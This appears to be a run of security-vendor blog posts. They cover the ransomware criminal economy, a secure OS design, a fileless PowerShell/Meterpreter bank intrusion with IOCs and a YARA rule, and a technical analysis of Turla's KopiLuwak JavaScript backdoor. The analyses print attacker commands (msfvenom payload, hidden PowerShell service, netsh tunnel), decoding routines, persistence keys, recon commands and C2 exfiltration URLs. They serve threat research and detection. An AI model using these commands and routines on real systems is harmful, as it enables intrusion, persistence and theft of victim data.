Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.

Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.

An advertisement offering unique crypto ransomware with a pay-per-build model

The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.

An example of a command and control panel which comes with the build of a certain ransomware family

Affiliate programs, the third type of involvement in the ransomware criminal business, is a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and couple of bitcoins as a partnership fee.

An advertisement for an affiliate program

Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.

Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.

To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.

3. There are some really big players on this market

If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.

The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise

There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.

4. Costs and profits on the underground ransomware market are high

We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.

The structure of the operating cost of a large ransomware group more or less looks like the following:

  1. Ransomware modules update
    1. New features
    2. Bypass techniques
    3. Encryption improvement
  2. Distribution (spam/exploit kits)
  3. AV check service
  4. Credentials for hacked servers
  5. Salary for hired professionals (usually these are IT administrators who support the server infrastructure)

The core of the whole group’s mechanics is ransomware code and the distribution channels.

They distribute ransomware in four main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and could cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.

Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.

And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.

How criminals use one infected organization to attack another

It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company’s contact list. It is hard to underestimate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods used by cybercriminals use to distribute malware, there is no way for him/ her to identify the attack.

As we’ve learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we’ve seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let’s go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.

The typical distribution of profit (green) vs. operating costs (red) in a ransomware business

That’s of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we’ve seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000 dollars.

5. Professional ransomware groups are shifting to targeted attacks

An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.

The mechanics of these new attacks are very different to what we’ve been used to seeing.

  • For initial infection they have not used exploit packs, or spear phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
  • To get into the organization’s network, this group used open source exploits and tools
  • If the organization had an unprotected server with RDP access this group tried to use brute force against it
  • To get the necessary access rights to install ransomware in the network with psexec they used a Mimikatz tool.
  • Then they could establish persistence using an open sourced RAT tool called PUPY
  • Once they had gained a foothold in the attacked network, they studied it, choose the most important files and encrypted them with a custom, yet unseen, build of ransomware.

Another group which we have found in another large organization did not use any ransomware at all. They encrypted data manually. To do this they choose important files on a server and move it into a password protected archive.

Conclusion

In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.

1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.

2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.

We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.

It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.

Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.

Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.

Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.

And the main advice – DO NOT PAY! If you pay the ransom, you money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they get access to, giving them access to much broader attack opportunities.

Features of secure OS realization

Thu, 02/09/2017 - 07:55

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

  • The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.

  • The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed based on architectural principles that can ensure its secure behavior, that meets the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskuOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.

However, access control provided by the microkernel cannot implement properties of the system related to supporting specific security policies. KasperskyOS implements the principle of separating access-related decisions based on the policy defined from access control implemented at the microkernel level. Access decisions based on computing security policy compliance verdicts are made by a dedicated component – the security server. Flask is the best known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).

Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched, will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose IS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.

Fileless attacks against enterprise networks

Wed, 02/08/2017 - 03:58

During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.

Description

This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.

We know that the Metasploit framework was used to generate scripts like the following one:

This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:

  • msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:

  • sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual

The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command:

  • netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0

That would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from remote Internet hosts.

The use of the “SC” and “NETSH” utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.

Features

The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.

In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:

  • cat mal_powershell.ps1_4 | cut -f12 -d” ” | base64 -di | cut -f8 -d\’ | base64 -di | zcat – | cut -f2 -d\( | cut -f2 -d\” | less | grep \/ | base64 -di | hd

Resulting in the following payload:

Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”

Victims

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below show the number of infections per country.

However we cannot confirm that all of them were infected by the same attacker.

Attribution

During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible. This closest groups with the same TTPs are GCMAN and Carbanak.

Conclusions

Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.

In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.

After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.

Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.

For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise

To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:

  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility

In unallocated space in the Windows registry, the following artefacts might be found:

  • powershell.exe -nop -w hidden -e
  • 10.10.1.12/8080
  • 10.10.1.11/4444

Please note that these IPs are taken from the IR case in which we participated, so there could be any other IP used by an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.

Verdicts:

  • MEM:Trojan.Win32.Cometer
  • MEM:Trojan.Win32.Metasploit
  • Trojan.Multi.GenAutorunReg.c
  • HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules rule msf_or_tunnel_in_registry { strings: $port_number_in_registry = "/4444" $hidden_powershell_in_registry = "powershell.exe -nop -w hidden" wide condition: uint32(0)==0x66676572 and any of them }

Rocket AI and the next generation of AV software

Tue, 02/07/2017 - 03:56

The annual Conference on Artificial Intelligence and Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. This is, most likely, one of the two most important conferences in the AI field. This year, 5,680 AI experts attended the conference (the second of these large conferences is known as ICML).

This is not the first year that Kaspersky Lab is taking part in the conference – it is paramount for our experts to be well informed on the most up-to-date approaches to machine learning. This time, there were five Kaspersky Lab employees at NIPS, each from a different department and each working with machine learning implementation in order to protect users from cyberthreats.

However, my intent is to tell you not about the benefit of attending the conference but about an amusing incident that was devised and put into action by AI luminaries.

Rocket AI is the Next Generation of Applied AI

This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.

Right as the conference was happening, the www.rocketai.org website was created with this bubble on the main page (see picture below):

Please note that this is not just AI, but the next generation of AI. The idea of the product is described below.

The Temporally Recurrent Optimal Learning™ approach (abbreviated as “TROL(L)”), which was not yet known to science, was actively promoted on Twitter by conference participants. Within several hours, this resulted in five large companies contacting the project’s authors with investment offers. The value of the “project” was estimated at tens of millions of dollars.

Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at Medium.com: “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”

In reality, the field of machine learning features nothing new; popular approaches to artificial intelligence are actually decades-old ideas.

“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.

An Anti-Virus of the Very Next Generation

It may seem that the outcome of the prank brought out nothing new: investors feel weakness for everything they hear about. Investment bubbles have existed and will continue to exist. Just our generation saw the advent of dotcoms, biometrics, and bitcoins. We have AI now, and I am sure that 2017 will give us something new as well.

Yet, after I had taken a peek at data-security start-ups, which are springing up like mushrooms after a rain and which claim that they employ the “very real” AI (of the very next generation), an amusing idea crossed my mind.

What would happen if we did the same thing that the respected AI experts did? We could come to agreements with other representatives in the cybersecurity area (I would like to point out the principle of “coopetition”, which combines market competition and cooperation in the areas of inspection and user protection) and create a joint project. Meet Rocket AV.

If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.

But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.

KopiLuwak: A New JavaScript Payload from Turla

Thu, 02/02/2017 - 10:00

On 28 January 2017, John Lambert of Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a “very interesting .JS backdoor“. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ICEDCOFFEE payloads, detailed in a private report from June 2016 (available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

Targeting for this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. Popularity of the malware, however, is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits as of January 2017. We assess with high confidence this new JavaScript will be used more heavily in the future as a stage 1 delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.

Actor Profile

Turla, also known as Snake / Uroburos / Venomous Bear and KRYPTON is a Russian-speaking APT group that has been active since at least 2007. Its activity can be traced to many high-profile incidents, including the 2008 attack against the US Central Command, (see Buckshot Yankee incident) or more recently, the attack against RUAG, a Swiss military contractor. The Turla group has been known as an agile, very dynamic and innovative APT, leveraging many different families of malware, satellite-based command and control servers and malware for non-Windows OSes.

Targeting Ukraine, EU-related institutions, governments of EU countries, Ministries of Foreign Affairs globally, media companies and possibly corruption related targets in Russia, the group intensified their activity in 2014, which we described in our paper Epic Turla. During 2015 and 2016 the group diversified their activities, switching from the Epic Turla waterhole framework to the Gloog Turla framework, which is still active. They also expanded their spear phishing activities with the Skipper / WhiteAtlas attacks, which leveraged new malware. Recently, the group has intensified their satellite-based C&C registrations ten-fold compared to their 2015 average.

Technical Details

Sample MD5: 6e7991f93c53a58ba63a602b277e07f7
Name: National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc
Author: user
LastModifiedBy: John
CreateDate: 2016:11:16 21:58:00
ModifyDate: 2016:11:24 17:42:00

Decoy document used in the attack

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs (MoFA) in Cyprus. Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.

The document contains a malicious macro, very similar to previous macros used by Turla in the past to deliver Wipbot, Skipper, and ICEDCOFFEE. However, the macro did contain a few modifications to it, mainly the XOR routine used to decode the initial JavaScript and the use of a “marker” string to find the embedded payload in the document.

New XOR Routine

Below is a snippet of the new XOR routine used to decode the initial JavaScript payload. Turla has consistently changed the values used in this routine over the last year, presumably to avoid easy detection:

Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean Dim THQNfU76nlSbtJ5nX8LY6 As Byte THQNfU76nlSbtJ5nX8LY6 = 45 For i = 0 To M5wI32R3VF2g5B21EK4d - 1 EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6 THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254)) Next i Q7JOhn5pIl648L6V43V = True End Function

Here is a function written in Python to assist in decoding of the initial payload:

def decode(payload, length): varbyte = 45 i = 0 for byte in payload: payload[i] = byte ^ varbyte varbyte = ((varbyte ^ 99) ^ (i % 254)) i += 1

Payload Offset

Another change in the macro is the use of a “marker” string to find the payload offset in the document. Instead of using hard coded offsets at the end of the document as in ICEDCOFFEE, the macro uses the below snippet to identify the start of the payload:

Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp") VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh" Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)

Second Layer JavaScript

Once the marker is found, the macro will carve out “15387 + 1” bytes (hard coded) from the end of the marker and pass that byte array to the aforementioned decoding routine. The end result is a JavaScript file (mailform.js – MD5: 05d07279ed123b3a9170fa2c540d2919) written to “%APPDATA%\Microsoft\Windows\”.

mailform.js – malicious obfuscated JavaScript payload

This file is then executed using Wscript.Shell.Run() with a parameter of “NPEfpRZ4aqnh1YuGwQd0”. This parameter is an RC4 key used in the next iteration of decoding detailed below.

The only function of mailform.js is to decode the third layer payload stored in the JavaScript file as a Base64 string. This string is Base64 decoded, then decrypted using RC4 with the key supplied above as a parameter (“NPEfpRZ4aqnh1YuGwQd0”). The end result is yet another JavaScript which is passed to the eval() function and executed.

Third Layer JavaScript

The third layer payload is where the C2 beaconing and system information collection is performed. This JS will begin by copying itself to the appropriate folder location based on the version of Windows running:

  1. c:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\mailform.js

  2. c:\Users\<USERNAME>\AppData\Local\Temp\mailform.js

  3. c:\Documents and Settings\<USERNAME>\Application Data\Microsoft\Windows\mailform.js

Persistence

Next, it will establish persistence on the victim by writing to the following registry key:

Key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\mailform
Value: wscript.exe /b “<PATH_TO_JS> NPEfpRZ4aqnh1YuGwQd0”

Profiling

After establishing its persistence, it will then execute a series of commands on the victim system using “cmd.exe /c” and store them to a file named “~dat.tmp”, in the same folder where “mailform.js” is located:

  • systeminfo
  • net view
  • net view /domain
  • tasklist /v
  • gpresult /z
  • netstat -nao
  • ipconfig /all
  • arp -a
  • net share
  • net use
  • net user
  • net user administrator
  • net user /domain
  • net user administrator /domain
  • set
  • dir %systemdrive%\Users\*.*
  • dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*
  • dir %userprofile%\Desktop\*.*
  • tasklist /fi “modules eq wow64.dll”
  • tasklist /fi “modules ne wow64.dll”
  • dir “%programfiles(x86)%”
  • dir “%programfiles%”
  • dir %appdata%

Once the information is collected into the temporary “~dat.tmp” file, the JavaScript reads its contents into memory, RC4 encrypts it with the key “2f532d6baec3d0ec7b1f98aed4774843”, and deletes the file after a 1 second sleep, virtually eliminating storage of victim information on disk and only having an encrypted version in memory.

Network Communications

With the victim info stored in encrypted form in memory, the JavaScript then will perform the necessary callback(s) to the C2 servers which are hard coded in the payload. The addresses seen in this payload were as follows:

  • http://soligro[.]com/wp-includes/pomo/db.php
  • http://belcollegium[.]org/wp-admin/includes/class-wp-upload-plugins-list-table.php

It should be noted that the above domains appear to have been compromised by the actor based on the locations of the PHP scripts.

Belcollegium[.]org – a legitimate website compromised and used for C2

Victim data is sent to the C2 servers in the form of a POST request. The headers of the POST request contain a unique User-Agent string that will remain the same per victim system. The User-Agent string is created by performing the following steps:

  1. Concatenate the string “KRMLT0G3PHdYjnEm” + <SYSTEM_NAME> + <USER NAME>

  2. Use the above string as input to the following function (System Name and User Name have been filled in with example data ‘Test’ and ‘Admin’):

    function EncodeUserAgent() { var out = ""; var UserAgent = 'KRMLT0G3PHdYjnEm' + 'Test' + 'Admin'; for (var i = 0; i < 16; i++) { var x = 0 for (var j = i; j < UserAgent.length - 1; j++) { x = x ^ UserAgent.charCodeAt(j); } x = (x % 10); out = out + x.toString(10); } out = out + 'KRMLT0G3PHdYjnEM'; return out; }

    The function above will produce a unique “UID” consisting of a 16-digit number with the string “KRMLT0G3PHdYjnEm” appended to the end. In the example above using the System Name “Test” and User Name “Admin”, the end result would be “2356406508689132KRMLT0G3PHdYjnEm”

  3. Prepend the string “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); ” to the result from the last step. This will now be the unique User-Agent value for the victim callbacks. In this example, the final result will be “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm”.

The POST request will contain the unique User-Agent string above as one of the headers and also the Base64 encoded version of the RC4 encrypted victim data collected earlier.

The C2 will respond in one of four ways after the POST request:

  1. “good”

  2. “exit”

  3. “work”

  4. “fail”

